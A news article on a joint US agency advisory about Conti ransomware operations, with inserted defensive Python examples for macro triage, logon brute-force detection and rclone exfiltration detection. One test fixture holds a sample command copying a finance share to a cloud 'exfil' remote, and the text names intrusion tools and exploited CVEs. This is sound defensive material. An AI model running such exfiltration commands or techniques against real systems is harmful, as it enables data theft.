Conti hackers continue to target US, international organizations, as attacks and IOCs increase

U.S. security agencies have updated a previously issued joint cybersecurity advisory on malicious operations carried out by Conti hackers against domestic and international organizations. The amendment includes newly identified indicators of compromise (IOCs) made up of nearly 100 domain names and adds the United States Secret Service (USSS) as a co-author.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) said on Wednesday that these domain names share registration and naming characteristics similar to those used by groups distributing Conti ransomware. The agencies also cautioned that while many of these domains have been used in malicious operations, some of them ‘may be abandoned or may share similar characteristics coincidentally,’ so the list is better treated as a set of leads to investigate than as a blocklist to apply unreviewed.

“While there are no specific or credible cyber threats to the U.S. homeland at this time, CISA, FBI, NSA, and the United States Secret Service (USSS) encourage organizations to review this advisory and apply the recommended mitigations,” the joint advisory said.

Last month, CISA and the FBI reported that the Conti ransomware group remains active and that reported Conti attacks against U.S. and international organizations have risen to more than 1,000. Tools frequently seen in these intrusions include TrickBot and Cobalt Strike.

In September, the agencies reported an increase in Conti ransomware activity, with over 400 attacks on U.S. and international organizations in which the actors stole files, encrypted servers and workstations, and demanded ransom payments in return for the stolen sensitive data. This followed an FBI alert in May identifying at least 16 Conti ransomware attacks within the previous year targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities.

While Conti is considered a ransomware-as-a-service (RaaS) variant, its structure differs from the typical affiliate model, the alert said. “It is likely that Conti developers pay the deployers of the ransomware a wage rather than a percentage of the proceeds used by affiliate cyber actors and receives a share of the proceeds from a successful attack,” it added.

MITRE ATT&CK notes that Conti was first observed in December 2019 and has been distributed via TrickBot. It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid.

Conti actors often gain initial access to networks through spearphishing campaigns using tailored emails that contain malicious attachments or links. Quite often, malicious Word attachments contain embedded scripts (commonly VBA macros) that download or drop other malware, such as TrickBot and IcedID, and/or Cobalt Strike, to assist with lateral movement and later stages of the attack life cycle, with the eventual goal of deploying Conti ransomware, the alert added.
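As an added illustration (not part of the advisory or of this article), the following Python snippet shows the first check an analyst or mail gateway would run on such an attachment: open the OOXML container and look for an embedded VBA project or embedded OLE objects. The sample documents it builds are constructed in memory for the demonstration and contain no real macro code; legacy binary .doc files are only recognised, not parsed.

```python
import io
import zipfile

# Magic bytes of an OLE2 compound file (legacy .doc, and the vbaProject.bin
# stream inside a macro-enabled OOXML document).
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def build_sample_document(with_macro: bool, with_embedding: bool = False) -> bytes:
    """Constructed OOXML container for testing only; it holds no real macro code."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Word stores VBA macros as an OLE2 stream at this path.
            z.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 64)
        if with_embedding:
            # Embedded OLE objects (another common dropper technique) live here.
            z.writestr("word/embeddings/oleObject1.bin", OLE_MAGIC + b"\x00" * 64)
    return buf.getvalue()


def triage_office_attachment(data: bytes) -> list:
    """Return a list of findings for an Office attachment; an empty list means nothing was flagged."""
    findings = []
    if data.startswith(OLE_MAGIC):
        # Legacy binary format: its VBA streams need an OLE parser, which is out of scope here.
        findings.append("legacy OLE2 document; inspect its VBA streams with an OLE parser")
        return findings
    if not data.startswith(b"PK"):
        findings.append("not an OOXML or OLE2 document")
        return findings
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["OOXML container is corrupt"]
    for name in archive.namelist():
        lowered = name.lower()
        if lowered.endswith("vbaproject.bin"):
            findings.append(f"VBA macro project present: {name}")
        elif "/embeddings/" in lowered:
            findings.append(f"embedded OLE object: {name}")
    return findings


if __name__ == "__main__":
    for label, doc in (("clean", build_sample_document(False)),
                       ("macro", build_sample_document(True)),
                       ("macro+ole", build_sample_document(True, True))):
        print(label, triage_office_attachment(doc))
```

A macro project inside a file that arrives with a .docx extension (rather than .docm) is a particularly strong signal, since Word will still honour the embedded project if the user enables content.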

The group also breaches networks using stolen or weak Remote Desktop Protocol (RDP) credentials, phone calls, fake software promoted through search engine optimization (SEO poisoning), other malware distribution networks such as ZLoader, and common vulnerabilities in external-facing assets.

In the execution phase, the actors run a ‘getuid’ payload before using a more aggressive payload, to reduce the risk of triggering antivirus engines, the advisory said. CISA and FBI have observed Conti actors using the Router Scan penetration testing tool to scan for and brute force routers, cameras, and network-attached storage devices with web interfaces. Additionally, the actors use Kerberos attacks to attempt to obtain the ‘Admin’ account hash, which they then brute force, it added.
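The RDP credential abuse in the previous paragraph and the router and NAS brute forcing described here leave the same trace on a Windows host: a burst of failed logons from one source, sometimes followed by a success. The following Python is an added example (not from the advisory or this article) of the aggregation logic a SIEM rule would implement over Windows Security events 4625 (failed logon) and 4624 (successful logon). The events are constructed for the demonstration: a burst from 203.0.113.7 cycling through usernames, then a success from the same address, plus one benign failure from 198.51.100.4. The field names, window and threshold are the example's own choices.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Logon types a remote attacker exercises against RDP: 10 is RemoteInteractive;
# with Network Level Authentication enabled, failures are recorded as type 3
# (Network) instead, so both are watched.
REMOTE_LOGON_TYPES = {3, 10}


def _event(seconds, event_id, user, src, logon_type=10):
    """Build one constructed event record in the shape of Security 4624/4625."""
    ts = datetime(2022, 3, 9, 2, 0, 0) + timedelta(seconds=seconds)
    return {"time": ts.isoformat(), "id": event_id, "user": user,
            "src": src, "logon_type": logon_type}


# Constructed sample telemetry (not real logs): eight failed logons in eight
# seconds from one address cycling through common usernames, then a success,
# plus a single unrelated failure from another address.
SAMPLE_EVENTS = [
    _event(i, 4625, user, "203.0.113.7")
    for i, user in enumerate(["administrator", "admin", "backup", "svc_sql",
                              "jsmith", "helpdesk", "scanner", "test"])
] + [
    _event(60, 4624, "jsmith", "203.0.113.7"),
    _event(90, 4625, "bob", "198.51.100.4"),
]


def detect_logon_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """Flag sources with >= threshold remote logon failures inside `window`,
    and any later success from a flagged source."""
    failures = defaultdict(list)   # src -> timestamps of recent failures
    users = defaultdict(set)       # src -> distinct usernames tried
    flagged = set()
    alerts = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["logon_type"] not in REMOTE_LOGON_TYPES:
            continue
        t = datetime.fromisoformat(e["time"])
        src = e["src"]
        if e["id"] == 4625:
            recent = failures[src]
            recent.append(t)
            users[src].add(e["user"])
            # Drop failures that have fallen out of the sliding window.
            while recent and t - recent[0] > window:
                recent.pop(0)
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"kind": "brute_force", "src": src,
                               "failures": len(recent),
                               "distinct_users": len(users[src]),
                               "first": recent[0].isoformat(),
                               "last": t.isoformat()})
        elif e["id"] == 4624 and src in flagged:
            # A success after a burst is the event worth paging on.
            alerts.append({"kind": "success_after_burst", "src": src,
                           "user": e["user"], "time": t.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_logon_brute_force(SAMPLE_EVENTS):
        print(alert)
```

The distinct-user count separates password spraying (many accounts, few attempts each) from a dictionary attack on one account; both should alert, but the response differs.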

The alert said that Conti actors are known to abuse legitimate remote monitoring and management (RMM) software and remote desktop software as backdoors to maintain persistence on victim networks. “The actors use tools already available on the victim network—and, as needed, add additional tools, such as Windows Sysinternals and Mimikatz—to obtain users’ hashes and clear-text credentials, which enable the actors to escalate privileges within a domain and perform other post-exploitation and lateral movement tasks. In some cases, the actors also use TrickBot malware to carry out post-exploitation tasks,” it added.

According to a recently leaked threat actor ‘playbook,’ Conti actors also exploit vulnerabilities in unpatched assets to escalate privileges and move laterally across a victim’s network, the alert said. These include the 2017 Microsoft Windows Server Message Block 1.0 server vulnerabilities (MS17-010), the ‘PrintNightmare’ vulnerability in the Windows Print Spooler service (CVE-2021-34527), and the ‘Zerologon’ vulnerability in Microsoft Active Directory domain controllers (CVE-2020-1472), it added.

The advisory also said that artifacts leaked with the playbook identify four Cobalt Strike command and control (C2) server Internet Protocol (IP) addresses that Conti actors previously used. CISA and FBI have observed Conti actors using different Cobalt Strike server IP addresses unique to each victim, it added, so IP indicators from one intrusion do not reliably carry over to another.

Conti actors often use the open-source Rclone command line program for data exfiltration. After the actors steal and then encrypt the victim’s sensitive data, they employ a double extortion technique in which they demand the victim pay a ransom for the release of the encrypted data and threaten the victim with public release of the stolen data if the ransom is not paid, the advisory added.
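Because rclone is a legitimate tool and the operators may rename the binary, detection has to look at the command line and PE metadata rather than the file name alone. The following Python is an added example (not from the advisory or this article) of that triage logic run over three constructed process-creation records in the shape of Sysmon Event ID 1: a renamed rclone pushing a file share to cloud storage, rclone under its own name with the version resource stripped, and a benign robocopy. The verbs, flags and `remote:path` syntax are rclone's own; the field names, sample paths and scoring rule are the example's assumptions, and whether OriginalFileName is populated depends on the telemetry source and on the binary carrying version information.

```python
import ntpath
import re

# Constructed process-creation records (not real telemetry) with the fields a
# Sysmon Event ID 1 or Windows 4688 record carries.
SAMPLE_PROCESSES = [
    {   # rclone renamed to look like a system binary, copying a file share to cloud storage
        "image": r"C:\Windows\Temp\svchost.exe",
        "original_file_name": "rclone.exe",
        "command_line": r'C:\Windows\Temp\svchost.exe copy "\\FS01\Finance" mega:exfil --config C:\Windows\Temp\r.conf -q --transfers 8',
    },
    {   # rclone under its own name, with no OriginalFileName available
        "image": r"C:\Users\Public\rclone.exe",
        "original_file_name": "",
        "command_line": r"rclone.exe sync C:\Data\Share s3:bucket --no-check-certificate",
    },
    {   # benign: robocopy between local drives
        "image": r"C:\Windows\System32\Robocopy.exe",
        "original_file_name": "robocopy.exe",
        "command_line": r"robocopy C:\Data D:\Backup /MIR",
    },
]

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "ls", "mount"}
RCLONE_FLAGS = {"--config", "--transfers", "--no-check-certificate", "--ignore-existing",
                "--auto-confirm", "--multi-thread-streams", "--bwlimit", "-q", "-P", "--progress"}
# An rclone remote looks like "name:path". Requiring a name of two or more
# characters that is not followed by a backslash keeps Windows drive letters
# such as C:\ from matching.
RCLONE_REMOTE = re.compile(r"(?<![\\/\w])([A-Za-z0-9_-]{2,}):(?!\\)")


def score_rclone_process(proc):
    """Return {'suspicious': bool, 'reasons': [...]} for one process record."""
    reasons = []
    image_name = ntpath.basename(proc["image"]).lower()
    # PE version resource survives a rename of the file on disk.
    if proc.get("original_file_name", "").lower() == "rclone.exe":
        reasons.append("OriginalFileName is rclone.exe")
        if image_name != "rclone.exe":
            reasons.append(f"renamed binary: {image_name}")
    # Command-line shape: an rclone verb plus a remote or an rclone-specific flag.
    tokens = proc["command_line"].split()
    verbs = RCLONE_VERBS.intersection(t.lower() for t in tokens[1:])
    flags = RCLONE_FLAGS.intersection(tokens)
    remotes = RCLONE_REMOTE.findall(proc["command_line"])
    if verbs and (remotes or flags):
        reasons.append("rclone-style command line: verb=%s remote=%s flags=%s"
                       % (",".join(sorted(verbs)), ",".join(remotes), ",".join(sorted(flags))))
    return {"suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for proc in SAMPLE_PROCESSES:
        print(ntpath.basename(proc["image"]), score_rclone_process(proc))
```

Pair this with egress telemetry: a host that has never spoken to a cloud storage provider suddenly moving gigabytes to one is the corroborating signal that turns a process alert into an exfiltration incident.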

Earlier this month, a Ukrainian security researcher leaked several years of internal chat logs and other sensitive data tied to Conti, a group that focuses on deploying its ransomware against companies with more than US$100 million in annual revenue.

“The chat logs offer a fascinating glimpse into the challenges of running a sprawling criminal enterprise with more than 100 salaried employees,” security journalist Brian Krebs wrote in a recent blog post. “The records also provide insight into how Conti has dealt with its own internal breaches and attacks from private security firms and foreign governments.”

To secure systems against Conti ransomware, CISA, FBI, and the National Security Agency (NSA) recommend mitigations including adopting multi-factor authentication (MFA), implementing network segmentation, and keeping operating systems and software up to date.
